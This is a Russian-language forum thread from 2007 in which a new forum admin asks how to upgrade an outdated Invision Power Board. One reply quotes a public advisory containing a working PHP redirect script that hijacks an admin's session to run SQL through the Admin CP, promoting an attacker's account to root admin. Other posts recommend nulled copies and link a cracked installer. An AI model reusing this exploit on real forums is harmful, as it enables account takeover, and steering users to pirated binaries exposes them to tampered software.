Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Мой форум Ipb (https://forum.antichat.xyz/showthread.php?t=32956)

Diablo 08.02.2007 05:39
Мой форум Ipb
 
Сначала хотел в уязвимости, но решил, что лучше сюда. Если надо - перенесите.

Назначен админом на оффициальном форуме моей сетки.
Стоит там дырявенький Ipb 2.0.4
Собираюсь обновить его хотябы до 2.1.* (2.1.7 - мечта)
В связи с этим вопросы:
1) Так как я этим никогда не занимался - прошу описать процедуру обновления. Что? Как? Куда?
2) Где можно надыбать движок бесплатно? Где этот брали я не знаю...
3) Заплатки. Собственно заплатки где взять, как ставить?
4) БД. Переносится на новую версию без проблем? Если есть особенности - объясните.

Заранее благодарен, всем помогшим с меня +2.

guest3297 08.02.2007 05:49
Нуленый ipb 2.1.7 по всему нету.

google
Цитата:
ipb 2.1.7 NULL
ipb NULL
В readme есть инструкции по апгейду там даже файлик специальный есть насколько я помню.

Abra 08.02.2007 12:57
Цитата:
Назначен админом
Цитата:
Так как я этим никогда не занимался
Эти две фразы должна подряд идти, да?
....

REDsaratov 08.02.2007 15:05
Цитата:
2) Где можно надыбать движок бесплатно? Где этот брали я не знаю...
ничего кроме гугля посоветовать не могу! сам искал и скачивал. у меня щас 2.1.7 в локалке стоит. сменил дизайн пришлось все перепахать в ручную.
Цитата:
3) Заплатки. Собственно заплатки где взять, как ставить?
вроде как уязвимость на эту версию движка известна через аватар, короче инжекция!
если из под рута и админ панели не будешь смотреть профиль пользователя то ничего не будет.
Цитата:
From: Rapigator <rapigator_at_yahoo.com>
Date: Wed, 4 Oct 2006 11:58:38 -0700 (PDT)

Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High

An attack exists where an admin can be redirected and
forced to execute SQL commands through IPB's SQL
Toolbox.

The following requirements must be met for this attack
to take place:
- The database table prefix must be known
- The admin must have access to the SQL Toolbox (any
"root admin")
- The admin must have images and referers turned on in
their browser, and their browser must follow Location
headers (default behaviour for most browsers)
- The admin must view a malicious script as an image
in their browser.

This attack works invisibly to the admin because only
the image is redirected, not the page.


1st method:
In this method, any user can force the admin to
execute SQL commands.

1. A user sets their avatar to the malicious script's
address
2. The admin looks up the user's account in the Admin
CP
3. The user's avatar is shown and the admin is
redirected....


2nd method:
A restricted admin can add any HTML to a forum's
description(including javascript).

1. A restricted admin adds the malicious script as an
image to a forum's description.
2. Upon going to the "Manage Forums" link in Admin CP,
an unrestricted admin will be redirected and the SQL
will be executed.


Example malicious image script:
<?php

//The member id to promote to root admin
$mid = 145;

//The database prefix (usually "ibf_")
$prefix = "ibf_";

if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}me mbe rs+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1");
}

?>
http://seclists.org/bugtraq/2006/Oct/0049.html
уязвимы:
Invision Power Board 2.1.0 - 2.1.7
Invision Power Board 2.2 Beta 1

вообщем SQL-injection!


жду: Заранее благодарен, всем помогшим с меня +2.

если хочешь переделанный дизайн (именно только css) выложу для IPB 2.1.7?????

Case69 09.02.2007 18:35
лучше Invision Power Board 2.2.1 поставить, обновляется он вобще класно, не смотря на то, что крякнутый. Единственный минус это руссификация...

Diablo 10.02.2007 01:12
Цитата:
Сообщение от REDsaratov
если хочешь переделанный дизайн (именно только css) выложу для IPB 2.1.7?????
А что там нового в дизайне? Расскажи, может мне понравится.

Abra, я никогда не занимался обновлением IPB. Разбираюсь в общем хорошо.

REDsaratov 10.02.2007 01:42
короче это надо видеть! если хочешь код выложу. мне не жалко, как к мрачному относишься? (по типа этого форума)или даже в xml файлах, прям все готовое только импортировать надо будет.

Diablo 10.02.2007 01:47
Цитата:
Сообщение от REDsaratov
короче это надо видеть! если хочешь код выложу. мне не жалко, как к мрачному относишься? (по типа этого форума)или даже в xml файлах, прям все готовое только импортировать надо будет.
Давай заценю. А насколько мрачно? Качественно сделано ?

REDsaratov 10.02.2007 03:03
сделано нормально вроде никто не жалуется
вот тебе пока ссылка на сам движок
http://narod.yandex.ru/100.xhtml?redhacker.narod.ru/2.1.7_rus.exe
блин замучился на сайт заливать седня скачал с какого-то не запомнил откуда
ну решил вот залить к себе на сайт!
пожалуйста пользуйся!

Diablo 15.02.2007 18:53
Поставил версию 2.2.1
Такая проблема: при нажатии на кнопку Опции форума не выезжает окошко с опциями (типа отметить прочитанными, и т.д.), а просто переходит в конец страницы и к адресу приписывает #forumoptions :(

http://img226.imageshack.us/img226/5...optionsvh2.jpg


Время: 00:29
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице